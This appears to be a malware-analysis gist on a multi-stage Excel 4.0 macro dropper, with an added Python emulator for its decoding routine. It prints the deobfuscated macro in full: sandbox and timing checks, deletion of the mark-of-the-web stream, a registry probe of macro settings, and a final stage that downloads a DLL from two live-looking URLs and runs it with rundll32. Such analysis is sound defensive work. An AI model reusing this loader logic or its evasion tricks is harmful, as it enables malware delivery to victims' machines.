@miller-itsec
Created February 4, 2022 14:50
Multi-Stage XLM

This multi-stage XLM (Excel 4.0 macro) downloads its second-stage payload only after a chain of environment checks passes, one of which requires that the workbook itself was downloaded from the internet. It contains anti-analysis tricks, such as verifying that WAIT() really slept for the requested time, and it removes the workbook's own origin artifacts, such as the Zone.Identifier alternate data stream (mark of the web) that a browser attaches to a downloaded file.

SHA-256: 5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a
Report: https://www.filescan.io/uploads/61fd39b19046890c53adaa11/reports/f0412948-2f44-4ad2-ad51-31d347e9dd56/overview

  • Stage 1: the entry-point stage. FORMULA(crack) is the key cell; it writes the next stage into the sheet, one formula per iteration, starting at R79C3 (30 formulas in total, which is exactly the length of stage 2).
C51	pound=(VALUE("0"))          ' outer loop counter, one iteration per formula to rebuild
C52	=WHILE(pound<30)
C55	=COUNT(R46C3:R85C10)
C56	arrivals=-1
C60	pound=pound+1
C61	crack=""
C63	=WHILE(arrivals<196)
C64	arrivals=arrivals+1
C65	=INDIRECT(ADDRESS(arrivals+56,18+pound))       ' read the text chunk at row arrivals+56, column 18+pound
C66	=IF(R65C3="ikhTQSvvltISB",SET.NAME("arrivals",196),SET.NAME("crack",crack&R65C3))      ' the string "ikhTQSvvltISB" is the end-of-formula sentinel and stops the inner loop; any other chunk is appended to `crack`
C68	=NEXT()
C72	=FORMULA(crack,ABSREF("R["&(pound-1)&"]C[0]",R79C3))       ' write the rebuilt formula (pound-1) rows below R79C3
C73	=COUNT(R28C1:R75C2)
C74
C75	=NEXT()
  • Stage 2: FORMULA(competent) is the key cell; it writes the next stage. The cells between [=GOTO(R102C3)] and [=RETURN()] form the decoding routine that is named attacked() and re-used by every later stage: each output formula is stored as one column of numbers (rows from `loads` downward, column `athletes`+`instruction`), a value above 1000 ends the column, and every number decodes as CHAR(value - key), with the key taken from `cookies` in rotation.
[=GOTO(R102C3)]         ' jump to `[attacked=R80C3]`
[bench=0]               ' running index into the key array `cookies`; reset only here, not per formula
[athletes=0]            ' output formula counter
[grove=ROWS(cookies)]   ' key length
[=WHILE(athletes<bottom)]
[ticket=-1]
[athletes=athletes+1]
[competent=""]
[=WHILE(ticket<500)]
[ticket=ticket+1]
[=INDIRECT(ADDRESS(ticket+loads,athletes+instruction,,,"Sheet1"))]      ' read the encoded number at row ticket+loads, column athletes+instruction (this cell is R89C3)
[=IF(R89C3>1000)]       ' a value above 1000 terminates the current formula
[ticket=500]
[=ELSE()]
[healthy=MOD(bench,grove)+1]            ' rotate through the key (1-based)
[volunteers=INDEX(cookies,healthy)]
[bench=bench+1]
[competent=competent&CHAR(R89C3-volunteers)]      ' decode one character
[=END.IF()]
[=NEXT()]
[=FORMULA(competent,ABSREF("R["&(athletes-1)&"]C[0]",positions))]       ' write the decoded formula (athletes-1) rows below `positions`
[=NEXT()]
[=RETURN()]
[attacked=R80C3]        ' name the routine above so later stages can call attacked()
[loads=99]              ' row offset of the encoded numbers
[instruction=5]         ' column offset of the encoded numbers
[cookies=R68C11:R77C11]     ' key array; this formula ends with :R77C11
[bottom=17]             ' number of formulas to decode (stage 3 occupies R109C3:R125C3)
[positions=R109C3]      ' destination of the decoded formulas
[=attacked()]       ' back to [bench=0]
  • Stage 3: re-uses the attacked() routine; the formula variable is still `competent`. Each FORMULA() below stores INT(<check>)+<constant> into one of the key cells R78C11:R82C11 that this stage (and stage 4, which extends the range to R84C11) hands to attacked() as `cookies`. Excel coerces TRUE to 1 and FALSE to 0, so a failed check does not abort the macro; it shifts one key value by one and the next stage silently decodes to garbage.
[=FORMULA(INT(ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."))+-309,R78C11)]        ' decoy error dialog; ALERT returns TRUE once OK is clicked and INT(TRUE) = 1, so R78C11 = 1-309 = -308
R110C3:  [=ERROR(TRUE,R112C3)]       ' install an error handler: on a macro error, run cell R112C3
R111C3:  [=FORMULA(INT(FILE.DELETE(GET.DOCUMENT(2)&"\"&GET.WINDOW(31)&":Zone.Identifier"))+56,R79C11)]              ' delete the workbook's own Zone.Identifier alternate data stream (GET.DOCUMENT(2) is its directory, GET.WINDOW(31) its file name); a browser creates this stream when the file is downloaded from the internet (mark of the web)
R112C3:  [=IF(ISERROR(R111C3),CLOSE(FALSE),)]       ' if the workbook was not downloaded from the internet there is no stream to delete, the workbook is closed without saving and execution never reaches the download stage; this is why the sample cannot be caught in an offline environment unless the stream is added to the file before detonation
[=FORMULA(INT(CALL("Xlcall32","Excel4","2JRJRR#",4,,2,288,65)=353)+-656,R80C11)]        ' Xlcall32!Excel4(xlfSum=4, 2 args, 288, 65) calls the built-in SUM(288,65) through the C API; the check passes only if the result is 353, i.e. only if CALL into Xlcall32 really works
[=APP.MAXIMIZE()]
[=FORMULA(INT(AND(ISNUMBER(SEARCH("Win",GET.WORKSPACE(1))),GET.WORKSPACE(14)>390,GET.WORKSPACE(42),GET.WORKSPACE(19),GET.WORKSPACE(13)>800))+316,R81C11)]        ' sandbox checks: the environment name (1) contains "Win", the usable workspace is taller than 390 points (14) and wider than 800 points (13), the machine can play sounds (42) and a mouse is present (19)
[=NOW()]
[=WAIT(NOW()+"00:00:01")]
[=NOW()]        ' a well known XLM trick: NOW(); WAIT(); NOW(), then subtract to ensure WAIT really happened
[=FORMULA(INT((R118C3-R116C3)*100000>1)+320,R82C11)]        ' one second is 1/86400 of a day (about 1.16e-5), so the difference times 100000 exceeds 1 only if the sleep was neither skipped nor fast-forwarded
[loads=99]
[instruction=22]
[cookies=R78C11:R82C11]     ' the five key cells computed above
[bottom=24]             ' stage 4 occupies R126C3:R149C3
[positions=R126C3]
[=attacked()]
  • Stage 4: a file-system write test and a registry check that macros are fully enabled; both results become further key cells (R83C11, R84C11).
[p="C:\Users\Public\Documents\"]        ' working directory for every dropped file
[=FOPEN(p&"wa4.txt",3)]                 ' access 3 = create a new file with read/write access; the handle lands in R127C3
[=WHILE(FSIZE(R127C3)<7746)]
[=FWRITE(R127C3,CHAR(RANDBETWEEN(33,125)))]     ' pad the file with random printable characters until it is 7746 bytes
[=NEXT()]
[=FORMULA(INT(FSIZE(R127C3)=7746)+29,R83C11)]   ' key cell R83C11 = 30 only if the writes really happened
[=FCLOSE(R127C3)]
[="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&p&"icSz4h.txt /y"]       ' reg.exe arguments (cell R133C3); GET.WORKSPACE(2) is the Excel version number
[=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R133C3,0,5)]      ' export the Excel macro-security key to icSz4h.txt (5 = SW_SHOW)
[=WHILE(ISERROR(FILES(p&"icSz4h.txt")))]       ' wait until reg.exe has written the export
[=WAIT(NOW()+"00:00:01")]
[=NEXT()]
[=FOPEN(p&"icSz4h.txt")]
[=FPOS(R138C3,215)]        ' seek past the .reg header and key path
[=FREAD(R138C3,255)]       ' read 255 characters into R140C3
[=FCLOSE(R138C3)]
[=FILE.DELETE(p&"icSz4h.txt")]
[=FORMULA(INT(ISNUMBER(SEARCH("""VBAWarnings""=dword:00000001",R140C3)))+301,R84C11)]        ' key cell R84C11 = 302 only if VBAWarnings is 1, i.e. "Enable all macros" in the Trust Center
[loads=99]
[instruction=46]
[cookies=R78C11:R84C11]     ' the seven key cells from stages 3 and 4
[bottom=9]              ' stage 5 occupies R150C3:R158C3
[positions=R150C3]
[=attacked()]
  • Stage 5: download the payload from one of two URLs and run it with rundll32.
[zzz="https://hrdgschool.com/logs.php"]         ' primary download URL
[xxx="https://allied-almansoor.com/logs.php"]   ' fallback download URL
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,zzz,p&"f4myZ.txt",0,0)]     ' download to C:\Users\Public\Documents\f4myZ.txt; cell R152C3 holds the HRESULT, 0 = S_OK
[=IF(R152C3<>0,,GOTO(R155C3))]      ' on success jump over the fallback to `[a="ShellExecuteA"]`; on failure fall through and retry with xxx
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,xxx,p&"f4myZ.txt",0,0)]
[a="ShellExecuteA"]
[b="C:\Windows\system32\rundll32.exe"]
[=CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"f4myZ.txt,DllRegisterServer ",0,5)]      ' execute the downloaded DLL: rundll32.exe f4myZ.txt,DllRegisterServer
[=CLOSE(FALSE)]     ' close the workbook without saving
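The attacked() routine that stages 2 to 4 share can be reproduced outside Excel, which is how the later stages are recovered when the environment gates (mark of the web, Xlcall32, GET.WORKSPACE values, WAIT timing, VBAWarnings) stop the sample in a sandbox. The Python below is an added example, not code from the gist or from the sample: it emulates the decoding loop and the stage-3 key derivation (R78C11:R82C11), and runs it over a small constructed grid built with an encoder of my own. Function names, the sparse-grid representation, the encoder and the two sample formulas are mine; the constants, offsets and loop bounds are the ones in the listing above.

```python
# Added example (not part of the gist or the sample): re-implements the
# decoding routine the sample names attacked() and that stages 2-4 call.
#
# Layout the XLM reads (see the [=INDIRECT(ADDRESS(...))] cell):
#   row    = ticket + loads         (ticket counts from 0)
#   column = athletes + instruction (athletes counts from 1)
# so every output formula is one column of numbers; a value above 1000 ends
# the column. Each number decodes as CHAR(value - key[bench % len(key)]), and
# `bench` keeps counting across formulas (reset only when attacked() starts),
# so the keystream never realigns with formula boundaries.

from typing import Dict, List, Sequence, Tuple

SENTINEL = 1001      # any value > 1000 terminates a column
MAX_TICKET = 500     # the [=WHILE(ticket<500)] bound


def derive_stage3_key(checks_pass: Sequence[bool] = (True,) * 5) -> List[int]:
    """Key cells R78C11:R82C11 as stage 3 writes them.

    Each cell is INT(<check>) + <constant>; Excel coerces TRUE to 1 and
    FALSE to 0, so a failing check shifts one key element by one and the
    next stage decodes to garbage instead of the macro aborting visibly.
    Order: ALERT clicked, Zone.Identifier deleted, Xlcall32 SUM == 353,
    GET.WORKSPACE screen/sound/mouse checks, WAIT really slept.
    """
    constants = [-309, 56, -656, 316, 320]   # the +N constants from the listing
    return [int(ok) + c for ok, c in zip(checks_pass, constants)]


def decode_stage(grid: Dict[Tuple[int, int], int], key: Sequence[int],
                 loads: int, instruction: int, bottom: int) -> List[str]:
    """Emulate [=WHILE(athletes<bottom)] ... [=NEXT()] over a sparse grid.

    grid maps (row, column) -> number, as INDIRECT(ADDRESS(row, col)) sees
    Sheet1; a missing cell reads as 0, like an empty cell in Excel.
    Returns the decoded formulas in the order FORMULA() writes them.
    """
    bench = 0
    grove = len(key)
    formulas = []
    for athletes in range(1, bottom + 1):
        competent = ""
        for ticket in range(0, MAX_TICKET + 1):
            value = grid.get((ticket + loads, athletes + instruction), 0)
            if value > 1000:
                break
            volunteers = key[bench % grove]   # MOD(bench,grove)+1 is the same index, 1-based
            bench += 1
            code = value - volunteers
            competent += chr(code) if 0 < code < 256 else "\ufffd"   # CHAR() covers 1..255
        formulas.append(competent)
    return formulas


def encode_stage(formulas: Sequence[str], key: Sequence[int],
                 loads: int, instruction: int) -> Dict[Tuple[int, int], int]:
    """Inverse of decode_stage; used here only to build a constructed sample
    grid in the sample's layout (the real sheet holds precomputed numbers)."""
    bench = 0
    grove = len(key)
    grid: Dict[Tuple[int, int], int] = {}
    for athletes, formula in enumerate(formulas, start=1):
        col = athletes + instruction
        for ticket, ch in enumerate(formula):
            grid[(ticket + loads, col)] = ord(ch) + key[bench % grove]
            bench += 1
        grid[(len(formula) + loads, col)] = SENTINEL
    return grid


# Constructed sample: two harmless formulas taken from the listing above,
# encoded with the stage-3 parameters (loads=99, instruction=22).
SAMPLE_FORMULAS = ["=APP.MAXIMIZE()", "=RETURN()"]
STAGE3 = dict(loads=99, instruction=22)
SAMPLE_GRID = encode_stage(SAMPLE_FORMULAS, derive_stage3_key(), **STAGE3)


def recover(checks_pass: Sequence[bool] = (True,) * 5) -> List[str]:
    """Decode the sample grid with the key that the given check results yield."""
    return decode_stage(SAMPLE_GRID, derive_stage3_key(checks_pass),
                        bottom=len(SAMPLE_FORMULAS), **STAGE3)


if __name__ == "__main__":
    print("all gates pass:   ", recover())
    print("WAIT gate failed: ", recover((True, True, True, True, False)))
```

Decoding a real sheet means dumping the numeric cells of Sheet1 into `grid` and, for stage 2, using the static key in R68C11:R77C11 with `loads=99, instruction=5, bottom=17`; for stages 3 and 4 the key is the intended all-checks-pass vector from `derive_stage3_key()` (extended by 30 and 302 for stage 4), because the sheet never contains those values. The second call in the demo shows why the gates are hard to spot in a sandbox: one failed check corrupts every fifth character of the next stage rather than stopping the macro.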